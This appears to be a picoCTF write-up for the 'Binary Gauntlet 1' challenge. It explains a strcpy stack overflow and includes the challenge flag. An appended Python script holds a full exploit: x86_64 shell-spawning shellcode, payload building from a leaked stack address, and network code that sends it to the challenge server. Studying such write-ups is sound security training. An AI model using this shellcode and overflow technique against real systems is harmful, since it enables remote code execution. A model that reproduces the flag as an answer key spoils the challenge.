Binary Gauntlet 1
Okay, time for a challenge.
Binary: gauntlet
Connect: nc mercury.picoctf.net 32853
1. Decompile the binary using Ghidra. The `main` function:

```c
undefined8 main(void)
{
  char local_78 [104];
  char *local_10;

  local_10 = (char *)malloc(1000);
  printf("%p\n", local_78);
  fflush(stdout);
  fgets(local_10, 1000, stdin);
  local_10[999] = '\0';
  printf(local_10);
  fflush(stdout);
  fgets(local_10, 1000, stdin);
  local_10[999] = '\0';
  strcpy(local_78, local_10);
  return 0;
}
```

2. Alright, so it is the same program as "Binary Gauntlet 0", except that the flag is no longer printed on a crash and the address of `local_78` is printed at the start of the program. Both reads go into a 1000-byte heap buffer, so the overflow happens in `strcpy(local_78, local_10)`: up to 999 bytes are copied into a 104-byte stack buffer with no length check. (`printf(local_10)` with user-controlled input is also a format-string bug, but it is not needed here.)

3. We can write some shellcode into `local_78`, pad out to the return address, and overwrite the return address with the address of `local_78` that is printed at the beginning, so the `return` from `main` lands on our shellcode. Things to get right:
   - Ghidra names stack variables by their offset from the return-address slot, so `local_78` starts 0x78 = 120 bytes below the saved return address (the 104-byte array ends exactly at `local_10`, which is at 0x10). Shellcode plus padding must total 120 bytes, followed by the 8-byte address.
   - The second input passes through `fgets` and then `strcpy`, so nothing before the return address may contain a newline (ends `fgets`) or a NUL byte (ends `strcpy`). The leaked stack address itself ends in two zero bytes; `strcpy` stops there, which is fine because the original return address (a libc pointer) already has those zero bytes.
   - This relies on the stack being executable (no NX) for this binary; the leaked address is what makes it work under ASLR.

4. c6e16a1b4182c2801ed657d4c482af88
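The attack in step 3, written out as an added exploit script; it is not part of the original writeup. Assumptions that the page does not state: the 120-byte distance from `local_78` to the return address follows from Ghidra's naming convention, the stack is executable, the shellcode is a standard 23-byte x86_64 `execve("/bin/sh")` stub, and the flag file is called `flag.txt` (`flag_cmd` is a placeholder). Only the Python standard library is used, so the payload builder and leak parser run offline; the network part runs only when the script is executed directly.

```python
"""Exploit helper for the Binary Gauntlet 1 stack overflow (added example).

Assumptions, none of them stated on the page:
- RET_OFFSET = 120: Ghidra names stack variables by their offset from the
  return-address slot, so local_78 starts 0x78 bytes below the saved return address;
- the stack is executable, otherwise returning into it faults;
- SHELLCODE is a standard NUL-free x86_64 execve("/bin//sh") stub;
- the flag is in flag.txt next to the binary (flag_cmd below is a placeholder).
"""
import socket
import struct

RET_OFFSET = 120  # assumed: bytes from the start of local_78 to the saved return address
NOP = b"\x90"

# Standard 23-byte x86_64 execve("/bin//sh", NULL, NULL) shellcode, no NUL or newline bytes
SHELLCODE = (
    b"\x48\x31\xf6"                              # xor    rsi, rsi   (argv = NULL)
    b"\x56"                                      # push   rsi        (string terminator)
    b"\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"  # movabs rdi, "/bin//sh"
    b"\x57"                                      # push   rdi
    b"\x54"                                      # push   rsp
    b"\x5f"                                      # pop    rdi        (rdi = &"/bin//sh")
    b"\x6a\x3b"                                  # push   0x3b
    b"\x58"                                      # pop    rax        (SYS_execve)
    b"\x99"                                      # cdq               (rdx = envp = NULL)
    b"\x0f\x05"                                  # syscall
)


def parse_leak(line: bytes) -> int:
    """Turn the program's first output line, printf("%p\\n", local_78), into an int."""
    return int(line.strip(), 16)


def build_payload(buf_addr: int, shellcode: bytes = SHELLCODE) -> bytes:
    """shellcode + NOP padding up to the return address + address of the buffer.

    The second input goes through fgets() and then strcpy(), so the bytes before the
    return address may contain neither '\\n' (ends fgets) nor '\\x00' (ends strcpy).
    The packed stack address ends in two zero bytes; strcpy stops there, which is
    fine because the original return address (a libc pointer) already has them.
    """
    if len(shellcode) > RET_OFFSET:
        raise ValueError("shellcode does not fit in the buffer before the return address")
    body = shellcode + NOP * (RET_OFFSET - len(shellcode))
    ret = struct.pack("<Q", buf_addr)
    for bad in (b"\x00", b"\n"):
        if bad in body or bad in ret[:6]:
            raise ValueError(f"payload contains {bad!r}; fgets/strcpy would truncate it")
    return body + ret


def exploit(host: str, port: int, flag_cmd: bytes = b"cat flag.txt\n") -> bytes:
    """Drive the remote service: read the leak, answer the first read, send the overflow.

    flag_cmd is an assumption (the page does not name the flag file); it is consumed
    by the shell that the shellcode spawns once main() returns.
    """
    with socket.create_connection((host, port)) as s:
        s.settimeout(5)
        leak = b""
        while not leak.endswith(b"\n"):          # printf("%p\n", local_78)
            c = s.recv(1)
            if not c:
                raise ConnectionError("no address leak received")
            leak += c
        buf_addr = parse_leak(leak)
        s.sendall(b"\n")                         # first fgets(): harmless input for printf(local_10)
        s.sendall(build_payload(buf_addr) + b"\n")  # second fgets() -> strcpy() overflow
        s.sendall(flag_cmd)                      # read by /bin/sh after the return into shellcode
        out = b""
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                out += chunk
        except socket.timeout:
            pass
        return out


if __name__ == "__main__":
    print(exploit("mercury.picoctf.net", 32853).decode(errors="replace"))
```

`build_payload` refuses any address whose low six bytes contain 0x0a or 0x00, because such a leak cannot be delivered through this input path at all; rerunning the binary yields a different stack address under ASLR.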